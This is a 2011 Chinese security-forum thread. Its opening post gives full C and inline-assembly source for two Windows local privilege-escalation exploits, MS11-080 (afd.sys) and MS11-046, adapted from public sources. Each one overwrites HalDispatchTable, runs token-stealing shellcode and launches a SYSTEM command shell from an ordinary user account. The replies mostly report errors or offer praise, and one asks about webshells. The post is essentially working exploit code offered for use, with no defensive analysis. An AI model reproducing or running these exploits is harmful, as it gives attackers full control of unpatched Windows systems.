本论坛为只读模式,仅供查阅,不能注册新用户,不能发帖/回帖,有问题可发邮件 xikug.xp (^) gmail.com
查看: 7025|回复: 12

MS11-080、MS11-046两个提权代码 [复制链接]

Rank: 2

发表于 2011-12-1 20:06:19 |显示全部楼层
本帖最后由 KiDebug 于 2011-12-1 20:07 编辑

拿着大牛写的代码自己弹CMD玩,多多包涵。。
  1. /*
  2. * MS11-080 Afd.sys Privilege Escalation Exploit
  3. * 来源:Matteo Memelli,http://www.exploit-db.com/exploits/18176/
  4. * 改编:KiDebug,Google@pku.edu.cn
  5. * 编译:VC6.0
  6. * 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户
  7. */
  8. #include <stdio.h>
  9. #include <Winsock2.h>
  10. #include <windows.h>
  11. #pragma comment (lib, "ws2_32.lib")

  12. typedef struct _RTL_PROCESS_MODULE_INFORMATION {
  13.         HANDLE Section;                 // Not filled in
  14.         PVOID MappedBase;
  15.         PVOID ImageBase;
  16.         ULONG ImageSize;
  17.         ULONG Flags;
  18.         USHORT LoadOrderIndex;
  19.         USHORT InitOrderIndex;
  20.         USHORT LoadCount;
  21.         USHORT OffsetToFileName;
  22.         UCHAR  FullPathName[ 256 ];
  23. } RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

  24. typedef struct _RTL_PROCESS_MODULES {
  25.         ULONG NumberOfModules;
  26.         RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
  27. } RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

  28. typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
  29. typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
  30. typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
  31. NtQueryIntervalProfile_        NtQueryIntervalProfile;
  32. NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
  33. NtQuerySystemInformation_ NtQuerySystemInformation;

  34. ULONG    PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;

  35. void _declspec(naked) ShellCode()
  36. {
  37.         __asm
  38.         {
  39.                 pushad
  40.                 pushfd
  41.                 mov esi,PsReferencePrimaryToken
  42. FindTokenOffset:
  43.                 lodsb
  44.                 cmp al, 8Dh;
  45.                 jnz FindTokenOffset
  46.                 mov edi,[esi+1]
  47.                 mov esi,PsInitialSystemProcess
  48.                 mov esi,[esi]
  49.                 push fs:[124h]
  50.                 mov eax,PsGetThreadProcess
  51.                 call eax
  52.                 add esi, edi
  53.                 add edi, eax
  54.                 movsd
  55.                 popfd
  56.                 popad
  57.                 ret
  58.         }
  59. }



  60. void main( )
  61. {
  62.         HMODULE        ntdll                                =        GetModuleHandle( "ntdll.dll" );
  63.         NtQueryIntervalProfile                =        (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
  64.         NtAllocateVirtualMemory                =        (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
  65.         NtQuerySystemInformation        =        ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
  66.         if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
  67.                 return;

  68.         ULONG    BaseAddress = 1 , RegionSize = 0x1000, status;
  69.         status = NtAllocateVirtualMemory( (HANDLE)0xFFFFFFFF, (PVOID*)&BaseAddress, 0, &RegionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE );
  70.         if ( status )
  71.                 return;

  72.         //取ntoskrnl的信息,只要调用一次就行
  73.         ULONG        NtoskrnlBase;
  74.         RTL_PROCESS_MODULES        module;
  75.         status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
  76.         if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
  77.                 return;

  78.         NtoskrnlBase           =        (ULONG)module.Modules[0].ImageBase;

  79.         //把ntoskrnl.exe加载进来
  80.         HMODULE                ntoskrnl;
  81.         ntoskrnl    =    LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
  82.         if ( ntoskrnl == NULL )
  83.                 return;

  84.         //计算实际地址
  85.         WriteToHalDispatchTable                =        (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; //需要覆盖的地址
  86.         PsInitialSystemProcess                =        (ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
  87.         PsReferencePrimaryToken                =        (ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
  88.         PsGetThreadProcess                        =        (ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
  89.        
  90.         //以下代码就各显神通了
  91.         if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
  92.                 return;

  93.         memset((PVOID)0x02070000,0x90,0x20000);
  94.         memcpy((PVOID)0x02080000,ShellCode,100);


  95.         WSADATA ws;

  96.         SOCKET tcp_socket;
  97.         struct sockaddr_in peer;
  98.         ULONG  dwReturnSize;

  99.         WSAStartup(0x0202,&ws);

  100.         peer.sin_family = AF_INET;
  101.         peer.sin_port = htons(4455);
  102.         peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

  103.         tcp_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

  104.         if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
  105.         {
  106.                 printf("connect error\n");
  107.         }

  108.         UCHAR        buf1[26]= "\x41\x41\x41\x41\x42\x42\x42\x42\x00\x00\x00\x00\x44\x44\x44\x44\x01\x00\x00\x00\xe8\x00\x34\xf0\x00";
  109.         memset((PVOID)0x1000,0x45,0x108);
  110.         memcpy((PVOID)0x1000,buf1,25);
  111.        
  112.         if(!DeviceIoControl((HANDLE)tcp_socket,0x000120bb, (PVOID)0x1004, 0x108, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
  113.         {
  114.                 printf("error=%d\n", GetLastError());
  115.         }

  116.         //触发,弹出SYSTEM的CMD
  117.         NtQueryIntervalProfile( 2, &status );
  118.         ShellExecute( NULL, "open", "cmd.exe", NULL, NULL, SW_SHOW);
  119.         return;
  120. }
复制代码
  1. /*
  2. * 触发MS11-046
  3. * 来源:azy,http://hi.baidu.com/azy0922/blog/item/053065d197cebfca572c8492.html
  4. * 改编:KiDebug,Google@pku.edu.cn
  5. * 编译:VC6.0
  6. * 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户
  7. */
  8. #include <stdio.h>
  9. #include <Winsock2.h>
  10. #include <windows.h>
  11. #pragma comment (lib, "ws2_32.lib")

  12. typedef struct _RTL_PROCESS_MODULE_INFORMATION {
  13.         HANDLE Section;                 // Not filled in
  14.         PVOID MappedBase;
  15.         PVOID ImageBase;
  16.         ULONG ImageSize;
  17.         ULONG Flags;
  18.         USHORT LoadOrderIndex;
  19.         USHORT InitOrderIndex;
  20.         USHORT LoadCount;
  21.         USHORT OffsetToFileName;
  22.         UCHAR  FullPathName[ 256 ];
  23. } RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

  24. typedef struct _RTL_PROCESS_MODULES {
  25.         ULONG NumberOfModules;
  26.         RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
  27. } RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

  28. typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
  29. typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
  30. typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
  31. NtQueryIntervalProfile_        NtQueryIntervalProfile;
  32. NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
  33. NtQuerySystemInformation_ NtQuerySystemInformation;

  34. ULONG    PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;

  35. void _declspec(naked) ShellCode()
  36. {
  37.         __asm
  38.         {
  39.                 pushad
  40.                 pushfd
  41.                 mov esi,PsReferencePrimaryToken
  42. FindTokenOffset:
  43.                 lodsb
  44.                 cmp al, 8Dh;
  45.                 jnz FindTokenOffset
  46.                 mov edi,[esi+1]
  47.                 mov esi,PsInitialSystemProcess
  48.                 mov esi,[esi]
  49.                 push fs:[124h]
  50.                 mov eax,PsGetThreadProcess
  51.                 call eax
  52.                 add esi, edi
  53.                 add edi, eax
  54.                 movsd
  55.                 popfd
  56.                 popad
  57.                 ret
  58.         }
  59. }



  60. void main( )
  61. {
  62.         HMODULE        ntdll                                =        GetModuleHandle( "ntdll.dll" );
  63.         NtQueryIntervalProfile                =        (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
  64.         NtAllocateVirtualMemory                =        (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
  65.         NtQuerySystemInformation        =        ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
  66.         if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
  67.                 return;
  68.        
  69.         //取ntoskrnl的信息,只要调用一次就行
  70.         ULONG        status, NtoskrnlBase;
  71.         RTL_PROCESS_MODULES        module;
  72.         status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
  73.         if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
  74.                 return;

  75.         NtoskrnlBase           =        (ULONG)module.Modules[0].ImageBase;

  76.         //把ntoskrnl.exe加载进来
  77.         HMODULE                ntoskrnl;
  78.         ntoskrnl    =    LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
  79.         if ( ntoskrnl == NULL )
  80.                 return;

  81.         //计算实际地址
  82.         WriteToHalDispatchTable                =        (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; //需要覆盖的地址
  83.         PsInitialSystemProcess                =        (ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
  84.         PsReferencePrimaryToken                =        (ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
  85.         PsGetThreadProcess                        =        (ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;

  86.         //以下代码就各显神通了
  87.         if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
  88.                 return;
  89.        
  90.         memset((PVOID)0x02070000,0x90,0x20000);
  91.         memcpy((PVOID)0x02080000,ShellCode,100);


  92.         WSADATA ws;

  93.         SOCKET tcp_socket;
  94.         struct sockaddr_in peer;
  95.         ULONG  dwReturnSize;

  96.         WSAStartup(0x0202,&ws);

  97.         peer.sin_family = AF_INET;
  98.         peer.sin_port = htons(0);
  99.         peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

  100.         tcp_socket = socket(AF_INET, SOCK_STREAM, 0);

  101.         if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
  102.         {
  103.                 printf("connect error\n");
  104.         }


  105.         DWORD buf[0x30];
  106.         buf[3]=1;
  107.         buf[4]=0x20;

  108.         if(!DeviceIoControl((HANDLE)tcp_socket,0x12007, (PVOID)buf, 0x60, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
  109.         {
  110.                 printf("error=%d\n", GetLastError());
  111.         }

  112.         //触发,弹出SYSTEM的CMD
  113.         NtQueryIntervalProfile( 2, &status );
  114.         ShellExecute( NULL, "open", "cmd.exe", NULL, NULL, SW_SHOW);
  115.         return;
  116. }
复制代码

Rank: 1

发表于 2011-12-2 08:44:05 |显示全部楼层
请教一下webshell如何运作呢?

Rank: 1

发表于 2011-12-2 21:40:17 |显示全部楼层
这个C的好像有点问题啊。执行不成功。

Rank: 1

发表于 2011-12-2 21:48:36 |显示全部楼层
知道是好东西,啃不了

Rank: 1

发表于 2011-12-3 19:29:33 |显示全部楼层
表示使用有错误无法运行

Rank: 1

发表于 2011-12-6 10:45:50 |显示全部楼层
KiDebug,Google@pku.edu.cn
pku.edu!!!

Rank: 1

发表于 2011-12-8 14:41:33 |显示全部楼层
北邮的牛人

Rank: 1

发表于 2011-12-15 10:39:29 |显示全部楼层
error,error

Rank: 1

发表于 2011-12-15 17:57:44 |显示全部楼层
这些ID都是些什么人?

Rank: 1

发表于 2012-1-12 10:42:24 |显示全部楼层
好东西啊,拿来调一下看看先

Rank: 1

发表于 2012-8-9 18:40:01 |显示全部楼层
好东西啊,拿来调一下看看先

Rank: 1

发表于 2012-11-27 08:45:45 |显示全部楼层
win7?

Rank: 1

发表于 2012-12-11 10:55:44 |显示全部楼层
有错误
您需要登录后才可以回帖 登录 | 立即加入

Archiver|手机版|第8个男人 - 论坛为只读模式,仅供查阅

GMT+8, 2019-4-21 19:14 , Processed in 0.026746 second(s), 8 queries .

Design by pvo.cn

© 2011 Pvo Inc.

回顶部